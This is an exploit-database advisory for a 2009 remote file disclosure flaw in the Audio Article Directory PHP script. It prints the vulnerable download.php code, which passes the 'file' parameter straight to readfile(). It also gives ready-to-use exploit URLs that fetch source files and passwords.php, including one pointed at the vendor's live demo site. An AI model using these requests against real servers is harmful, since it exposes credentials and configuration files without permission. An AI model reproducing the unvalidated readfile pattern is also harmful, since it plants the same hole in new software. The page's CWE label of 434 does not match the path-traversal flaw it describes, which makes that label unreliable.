Audio Article Directory Remote File Disclosure Vulnerability

vendor:

Audio Article Directory

by:

ThE g0bL!N

7,5

CVSS

HIGH

Remote File Disclosure

434

CWE

Product Name: Audio Article Directory

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Audio Article Directory Remote File Disclosure Vulnerability

The vulnerability exists due to insufficient validation of user-supplied input in the 'file' parameter of the 'download.php' script. A remote attacker can download arbitrary files from the vulnerable server.

Mitigation:

Input validation should be performed to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

#################################################################################################################
[+] Audio Article Directory Remote File Disclosure Vulnerability
[+] Discovered By ThE g0bL!N
Vendor:http://audioarticledirectory.com
#################################################################################################################
Poc
---
Download.php
<?
$file = "./".$_GET['file']; => one
 header('Content-Description: File Transfer');
           header('Content-Type: application/force-download');
           header("Content-Disposition: attachment; filename=\"".basename($file)."\";");
           header('Content-Length: ' . filesize($file));
@readfile($file) OR die(); => 2
?>
Exploit
----
http://victim/download.php?file=download.php
http://victim/download.php?file=./passwords.php
Demo
----
http://audioarticledirectory.com/demo/download.php?file=./passwords.php
################################################################################################################

# milw0rm.com [2009-06-29]